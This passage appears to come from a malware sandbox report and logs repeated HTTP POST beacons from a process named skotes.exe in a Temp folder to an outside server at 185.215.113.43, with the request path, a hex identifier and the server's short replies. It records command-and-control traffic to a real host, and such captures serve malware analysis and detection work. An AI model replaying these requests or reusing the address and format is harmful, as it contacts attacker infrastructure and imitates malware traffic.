Nov 13, 2024 20:42:18.517082930 CET	210	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:42:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50223	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:18.740117073 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:19.659233093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50224	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:21.287647963 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:22.213982105 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50225	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:23.724277020 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:24.655020952 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50226	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:26.271814108 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:27.221786022 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50227	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:28.743590117 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:29.655085087 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50230	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:31.285687923 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:32.219326973 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50231	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:33.739562035 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:34.674983025 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50232	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:36.307698011 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:37.229419947 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 13, 2024 20:42:37.516453028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50234	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:38.749468088 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:39.661639929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50235	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:41.317058086 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:42.226775885 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50243	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:43.739486933 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:44.653868914 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50245	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:46.285799980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:47.188910961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50246	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:48.753582954 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:49.682295084 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50249	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:51.378559113 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:52.290641069 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50251	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:53.812299013 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:54.729218006 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50253	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:56.371211052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:57.273416996 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50257	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:58.860296011 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:59.784674883 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50259	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:01.414283991 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:02.326009035 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50262	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:03.836673021 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:05.202253103 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:43:05.205496073 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:43:05.207647085 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50265	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:06.835057974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:07.745233059 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50268	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:09.262979984 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:10.167598963 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50271	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:11.792263985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:12.692754030 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50274	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
